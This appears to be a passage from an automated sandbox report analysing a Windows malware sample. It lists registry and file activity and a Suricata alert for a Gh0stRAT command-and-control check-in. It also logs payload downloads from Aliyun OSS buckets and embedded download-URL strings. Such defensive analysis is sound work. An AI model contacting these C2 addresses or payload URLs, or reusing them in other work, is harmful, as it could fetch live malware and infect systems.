                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_00007FFBC320A1B8 FindFirstFileExW,6_2_00007FFBC320A1B8
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004C5A33 __EH_prolog,GetFullPathNameA,lstrcpyn,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpy,49_2_004C5A33
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004A1C80 FindFirstFileA,FindFirstFileA,FindFirstFileA,FindClose,49_2_004A1C80
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004A04A0 FindFirstFileA,FileTimeToLocalFileTime,FileTimeToDosDateTime,FindClose,49_2_004A04A0
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_00408EFE __EH_prolog,GetFileAttributesA,lstrcpy,FindFirstFileA,FindClose,49_2_00408EFE
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_00408E80 __EH_prolog,FindFirstFileA,FindClose,49_2_00408E80
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_00409040 __EH_prolog,GetFullPathNameA,lstrcpyn,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpy,49_2_00409040
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0040935F __EH_prolog,FindFirstFileA,FindFirstFileA,IsWindow,InterlockedIncrement,FindNextFileA,FindClose,FindFirstFileA,IsWindow,InterlockedIncrement,FindNextFileA,FindClose,49_2_0040935F
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0040E79C __EH_prolog,FindFirstFileA,FindClose,49_2_0040E79C
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004CA859 FindFirstFileA,FindClose,49_2_004CA859
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0040E965 __EH_prolog,FindFirstFileA,FindFirstFileA,InterlockedIncrement,FindNextFileA,FindClose,FindFirstFileA,InterlockedIncrement,FindNextFileA,FindClose,49_2_0040E965
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004469AF __EH_prolog,FindFirstFileA,FindFirstFileA,IsWindow,InterlockedIncrement,FindNextFileA,FindClose,FindFirstFileA,InterlockedIncrement,FindNextFileA,FindClose,49_2_004469AF
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004D2C75 __EH_prolog,lstrcpy,FtpFindFirstFileA,49_2_004D2C75
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004472CA __EH_prolog,FindFirstFileA,IsWindow,InterlockedIncrement,FindNextFileA,FindClose,49_2_004472CA
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004A73D0 lstrcpy,FindFirstFileA,GetLastError,SetLastError,49_2_004A73D0
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_00427512 __EH_prolog,FindFirstFileA,FindClose,49_2_00427512
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_100126FA FindFirstFileExW,49_2_100126FA
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_00425624 __EH_prolog,GetLogicalDriveStringsA,49_2_00425624
                Source: C:\Users\user\Documents\l0tiFM.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000DFFE
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000DDFF
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 4x nop then movsxd rbx, qword ptr [r14+10h]6_2_0000000140011270
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000DE96
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000DEFB
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000E178
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000DDD9

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.8:49988 -> 8.210.66.183:8917
                Source: global trafficTCP traffic: 192.168.2.8:49988 -> 8.210.66.183:8917
                Source: global trafficTCP traffic: 192.168.2.8:49995 -> 38.45.124.13:8050
                Source: Joe Sandbox ViewIP Address: 118.178.60.9 118.178.60.9
                Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknownTCP traffic detected without corresponding DNS query: 38.45.124.13
                Source: unknownTCP traffic detected without corresponding DNS query: 38.45.124.13
                Source: unknownTCP traffic detected without corresponding DNS query: 38.45.124.13
                Source: unknownTCP traffic detected without corresponding DNS query: 38.45.124.13
                Source: unknownTCP traffic detected without corresponding DNS query: 38.45.124.13
                Source: unknownTCP traffic detected without corresponding DNS query: 38.45.124.13
                Source: unknownTCP traffic detected without corresponding DNS query: 38.45.124.13
                Source: unknownTCP traffic detected without corresponding DNS query: 38.45.124.13
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0041C471 __EH_prolog,GetTempPathA,GetTempFileNameA,SetFileAttributesA,DeleteFileA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GlobalFree,GlobalFree,GlobalFree,FreeLibrary,URLDownloadToFileA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,49_2_0041C471
                Source: global trafficHTTP traffic detected: GET /i.dat HTTP/1.1User-Agent: GetDataHost: 662hfg.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /a.gif HTTP/1.1User-Agent: GetDataHost: 662hfg.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /b.gif HTTP/1.1User-Agent: GetDataHost: 662hfg.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /c.gif HTTP/1.1User-Agent: GetDataHost: 662hfg.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /d.gif HTTP/1.1User-Agent: GetDataHost: 662hfg.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /s.dat HTTP/1.1User-Agent: GetDataHost: 662hfg.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /s.jpg HTTP/1.1User-Agent: GetDataHost: 662hfg.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /drops.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /f.dat HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /FOM-50.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /FOM-51.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /FOM-52.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /FOM-53.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /extra-task2.png HTTP/1.1User-Agent: Chrome/114.0.0.0Host: upitem.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /dsb-hr2.png HTTP/1.1User-Agent: Chrome/114.0.0.0Host: upitem.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /dsb-hr3.png HTTP/1.1User-Agent: Chrome/114.0.0.0Host: upitem.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /dsb-hr1.png HTTP/1.1User-Agent: Chrome/114.0.0.0Host: upitem.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /page-404.png HTTP/1.1User-Agent: Chrome/114.0.0.0Host: upitem.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
                Source: global trafficDNS traffic detected: DNS query: 662hfg.oss-cn-beijing.aliyuncs.com
                Source: global trafficDNS traffic detected: DNS query: 22mm.oss-cn-hangzhou.aliyuncs.com
                Source: global trafficDNS traffic detected: DNS query: gqsqoq.net
                Source: global trafficDNS traffic detected: DNS query: upitem.oss-cn-hangzhou.aliyuncs.com
                Source: DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%s/%d.dll
                Source: DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%s/%d.dllC:
                Source: DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%s/ip.txt
                Source: DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%s/ip.txtC:
                Source: DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%s/upx.rar
                Source: DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%s/upx.rarC:
                Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
                Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                Source: lBoqoqIC.exe, 00000031.00000002.3351620022.00000000030EF000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://cinskw.net:6090/license
                Source: lBoqoqIC.exe, 00000031.00000002.3351620022.00000000030EF000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://cinskw.net:6090/licensecinskw.net
                Source: lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp, lBoqoqIC.exe.42.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
                Source: lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp, lBoqoqIC.exe.42.drString found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
                Source: lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp, lBoqoqIC.exe.42.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
                Source: lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp, lBoqoqIC.exe.42.drString found in binary or memory: http://crl.globalsign.com/root.crl0G
                Source: lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp, lBoqoqIC.exe.42.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
                Source: l0tiFM.exe.0.dr, 189atohci.sys.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
                Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
                Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0I
                Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0P
                Source: lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp, lBoqoqIC.exe.42.drString found in binary or memory: http://ocsp.globalsign.com/rootr103
                Source: l0tiFM.exe.0.dr, 189atohci.sys.0.drString found in binary or memory: http://ocsp.thawte.com0
                Source: lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp, lBoqoqIC.exe.42.drString found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
                Source: lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp, lBoqoqIC.exe.42.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
                Source: lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp, lBoqoqIC.exe.42.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                Source: l0tiFM.exe.0.drString found in binary or memory: http://s.symcb.com/pca3-g5.crl0
                Source: l0tiFM.exe.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
                Source: l0tiFM.exe.0.drString found in binary or memory: http://s.symcd.com06
                Source: l0tiFM.exe.0.drString found in binary or memory: http://s.symcd.com0_
                Source: l0tiFM.exe.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                Source: l0tiFM.exe.0.drString found in binary or memory: http://s2.symcb.com0
                Source: lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002AF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microso
                Source: DfP1K3.exe, 0000002A.00000002.3348166976.0000000000B16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft.c
                Source: lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp, lBoqoqIC.exe.42.drString found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
                Source: lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp, lBoqoqIC.exe.42.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
                Source: l0tiFM.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0a
                Source: l0tiFM.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                Source: l0tiFM.exe.0.drString found in binary or memory: http://sv.symcd.com0&
                Source: l0tiFM.exe.0.drString found in binary or memory: http://sw.symcb.com/sw.crl0
                Source: l0tiFM.exe.0.drString found in binary or memory: http://sw.symcd.com0
                Source: l0tiFM.exe.0.drString found in binary or memory: http://sw1.symcb.com/sw.crt0
                Source: l0tiFM.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                Source: l0tiFM.exe.0.dr, 189atohci.sys.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                Source: l0tiFM.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                Source: l0tiFM.exe.0.dr, 189atohci.sys.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                Source: l0tiFM.exe.0.dr, 189atohci.sys.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                Source: l0tiFM.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                Source: 189atohci.sys.0.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                Source: lBoqoqIC.exe, 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.indigorose.com/route.php?pid=suf60buy
                Source: l0tiFM.exe.0.drString found in binary or memory: http://www.symauth.com/cps0(
                Source: l0tiFM.exe.0.drString found in binary or memory: http://www.symauth.com/rpa00
                Source: l0tiFM.exe, 00000007.00000003.2330226957.0000000003CFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg
                Source: l0tiFM.exe, 00000007.00000003.2330226957.0000000003CFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpghttps://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51
                Source: l0tiFM.exe, 00000007.00000003.2330226957.0000000003CFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg
                Source: l0tiFM.exe, 00000007.00000003.2330226957.0000000003CFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpg
                Source: l0tiFM.exe, 00000007.00000003.2330226957.0000000003CFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpg
                Source: l0tiFM.exe, 00000007.00000003.2257245809.00000000005E8000.00000004.00000020.00020000.00000000.sdmp, l0tiFM.exe, 00000007.00000003.2256932000.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpg
                Source: 2976587-987347589.07.exe, 00000000.00000003.1954802262.0000000000D27000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.1954802262.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.1954802262.0000000000D10000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.1936053133.0000000000D0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/
                Source: 2976587-987347589.07.exe, 00000000.00000003.1936053133.0000000000D27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/1-2246122658-3693405117-2476756634-1003F
                Source: 2976587-987347589.07.exe, 00000000.00000003.1936053133.0000000000D27000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.1954802262.0000000000D27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/7-2476756634-1003
                Source: 2976587-987347589.07.exe, 00000000.00000003.1954802262.0000000000D27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/7-2476756634-1003F
                Source: 2976587-987347589.07.exe, 00000000.00000003.1935998840.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2003088964.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.1954749975.0000000000D6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/a.gif
                Source: 2976587-987347589.07.exe, 00000000.00000003.1935998840.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2003088964.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.1954749975.0000000000D6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/a.gifB
                Source: 2976587-987347589.07.exe, 00000000.00000003.2003088964.0000000000D40000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.1954749975.0000000000D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/b
                Source: 2976587-987347589.07.exe, 00000000.00000003.2003088964.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.1954749975.0000000000D6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/b.gif
                Source: 2976587-987347589.07.exe, 00000000.00000003.2003088964.0000000000D6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/c.gif
                Source: 2976587-987347589.07.exe, 00000000.00000003.2003088964.0000000000D6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/d.gif
                Source: 2976587-987347589.07.exe, 00000000.00000003.2003088964.0000000000D6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/d.gifn
                Source: 2976587-987347589.07.exe, 00000000.00000003.1935998840.0000000000D6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/i.dat
                Source: 2976587-987347589.07.exe, 00000000.00000003.1936053133.0000000000D27000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.1954802262.0000000000D27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/v
                Source: 2976587-987347589.07.exe, 00000000.00000003.1954802262.0000000000D27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/z
                Source: l0tiFM.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
                Source: l0tiFM.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
                Source: l0tiFM.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0)
                Source: l0tiFM.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0.
                Source: lBoqoqIC.exe, 00000031.00000002.3351388145.0000000002D2A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://page-404.png
                Source: lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002AF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/
                Source: DfP1K3.exe, 0000002A.00000002.3348166976.0000000000B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/D
                Source: lBoqoqIC.exe, 00000031.00000002.3348959801.0000000000786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/N
                Source: DfP1K3.exe, 0000002A.00000002.3352818905.0000000003AC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr1.png
                Source: DfP1K3.exe, 0000002A.00000002.3352818905.0000000003AC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr1.png2I
                Source: DfP1K3.exe, 0000002A.00000002.3352818905.0000000003AC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr1.png3
                Source: DfP1K3.exe, 0000002A.00000002.3352818905.0000000003AC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr1.pngXH
                Source: DfP1K3.exe, 0000002A.00000002.3352818905.0000000003AC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr1.pngiH
                Source: DfP1K3.exe, 0000002A.00000002.3352818905.0000000003AC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr1.pngvI
                Source: DfP1K3.exe, 0000002A.00000002.3352818905.0000000003AC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr2.png
                Source: DfP1K3.exe, 0000002A.00000002.3352818905.0000000003AC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr3.png
                Source: DfP1K3.exe, 0000002A.00000002.3352818905.0000000003AC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr3.png3H
                Source: DfP1K3.exe, 0000002A.00000002.3352818905.0000000003AC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr3.png;
